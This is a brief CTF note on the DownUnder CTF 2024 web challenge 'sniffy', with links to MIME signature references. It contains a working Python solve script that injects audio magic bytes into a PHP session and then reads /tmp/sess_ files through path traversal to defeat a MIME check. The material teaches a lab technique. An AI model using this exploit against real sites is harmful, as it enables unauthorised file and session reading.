====== Mime Spoofing + php ======

Lessons learned from **DownUnder** CTF 2024: [WEB] sniffy

<code python>
import requests

cookies = {
	'PHPSESSID': 'abcd'
}

for i in range(4):
	r = requests.get('http://localhost:8080/', params={'theme': 'a' * i + 'M.K.' * 300}, cookies=cookies)
	r = requests.get('http://localhost:8080/audio.php', params={'f': '../../../../tmp/sess_abcd'})
	if r.status_code != 403:
		print('found')
		print(r.text)
</code>

Note: Remember /tmp/sess_COOKIE


https://github.com/waviq/PHP/blob/master/Laravel-Orang1/public/filemanager/connectors/php/plugins/rsc/share/magic.mime

https://www.garykessler.net/library/file_sigs.html